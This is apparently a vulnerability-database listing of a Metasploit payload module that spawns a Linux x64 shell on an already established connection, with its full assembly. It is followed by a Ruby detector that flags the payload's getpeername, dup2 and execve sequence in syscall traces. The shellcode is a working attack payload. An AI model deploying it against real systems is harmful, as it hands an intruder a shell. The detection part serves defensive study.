Linux Command Shell, Find Port Inline

14 Mar 2012 21:39:56 | Reported by mak | Type: metasploit | Source: www.rapid7.com

Linux Command Shell, Find Port Inline. Spawn a shell on an established connection

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


module MetasploitModule

  CachedSize = 98

  include Msf::Payload::Single
  include Msf::Payload::Linux::X64::Prepends
  include Msf::Sessions::CommandShellOptions

  def initialize(info = {})
    super(merge_info(info,
      'Name'          => 'Linux Command Shell, Find Port Inline',
      'Description'   => 'Spawn a shell on an established connection',
      'Author'        => 'mak',
      'License'       => MSF_LICENSE,
      'Platform'      => 'linux',
      'Arch'          => ARCH_X64,
      'Handler'       => Msf::Handler::FindPort,
      'Session'       => Msf::Sessions::CommandShellUnix,
      'Payload'       =>
        {
          'Offsets' =>
            {
              'CPORT' => [ 39, 'n' ],
            },

          'Assembly' => %Q|
            xor rdi,rdi
            xor rbx,rbx
            mov bl,0x18
            sub rsp,rbx
            lea rdx,[rsp]
            mov [rdx], 0x10
            lea rsi,[rsp+8]
          find_port:
            push 0x34     ; getpeername
            pop rax
            syscall
            inc rdi
            cmp word [rsi+2],0x4142
            jne find_port
            dec rdi
            push 2
            pop rsi
          dup2:
            push 0x21     ; dup2
            pop rax
            syscall
            dec rsi
            jns dup2
            mov rbx,rsi
            mov ebx, 0x68732f41
            mov eax,0x6e69622f
            shr rbx,8
            shl rbx,32
            or  rax,rbx
            push rax
            mov rdi,rsp
            xor rsi,rsi
            mov rdx,rsi
            push 0x3b     ; execve
            pop rax
            syscall
          |
        }
      ))
  end

  def size
    return 91
  end


end
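
Detection view, as an added example that is not part of the Metasploit module: the assembly above calls getpeername (0x34) on ascending descriptors starting at 0, then dup2 (0x21) onto 2, 1 and 0, then execve (0x3b) of /bin/sh, and that sequence can be flagged in a syscall trace. The `pid syscall(args) = ret` line format (as written by `strace -f -o`), the sample traces, the shell list and all names below are constructed assumptions.

```ruby
# Added example: flag "scan fds with getpeername -> dup2 onto 0/1/2 -> exec shell".
# Assumed input: strace-style lines "<pid> <syscall>(<args>) = <ret> ...".
SHELLS = %w[/bin/sh /bin/bash /bin/dash].freeze # assumption: shells worth flagging

def find_port_suspects(lines)
  state = Hash.new { |h, k| h[k] = { probed: [], duped: [] } }
  hits = []
  lines.each do |line|
    m = line.match(/\A(\d+)\s+(\w+)\((.*)\)\s+=\s+(-?\d+)/) or next
    pid, call, args, ret = m[1].to_i, m[2], m[3], m[4].to_i
    s = state[pid]
    case call
    when 'getpeername'
      fd = args.to_i # first argument is the descriptor
      # Keep only an unbroken run of ascending descriptors (the scan loop).
      s[:probed] = [] unless s[:probed].empty? || fd == s[:probed].last + 1
      s[:probed] << fd
      s[:duped] = []
    when 'dup2'
      oldfd, newfd = args.split(',').map(&:to_i)
      s[:duped] << newfd if ret >= 0 && oldfd == s[:probed].last
    when 'execve'
      path = args[/\A"([^"]*)"/, 1]
      scanned = s[:probed].size >= 2               # more than one fd was probed
      rewired = ([0, 1, 2] - s[:duped]).empty?     # stdio now points at that fd
      if ret.zero? && scanned && rewired && SHELLS.include?(path)
        hits << { pid: pid, fd: s[:probed].last, shell: path }
      end
      state.delete(pid)
    end
  end
  hits
end

# Constructed trace of the behaviour described by the payload.
SAMPLE_TRACE = [
  '4242 getpeername(0, 0x7ffc2a10, [16]) = -1 ENOTSOCK',
  '4242 getpeername(1, 0x7ffc2a10, [16]) = -1 ENOTSOCK',
  '4242 getpeername(2, 0x7ffc2a10, [16]) = -1 ENOTSOCK',
  '4242 getpeername(3, {sa_family=AF_INET, sin_port=htons(51000)}, [16]) = 0',
  '4242 dup2(3, 2) = 2', '4242 dup2(3, 1) = 1', '4242 dup2(3, 0) = 0',
  '4242 execve("/bin/sh", NULL, NULL) = 0'
].freeze
# Constructed benign trace: one known socket is wired to a shell, with no fd scan.
BENIGN_TRACE = [
  '5151 getpeername(4, {sa_family=AF_INET, sin_port=htons(40222)}, [16]) = 0',
  '5151 dup2(4, 0) = 0', '5151 dup2(4, 1) = 1', '5151 dup2(4, 2) = 2',
  '5151 execve("/bin/sh", NULL, NULL) = 0'
].freeze
```

The descriptor scan is what separates this pattern from an inetd-style service that hands a single known socket to a shell, which is why the benign trace produces no hit.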

14 Jan 2025 14:31 (Current)
Vulners AI Score: 7.4 (High risk)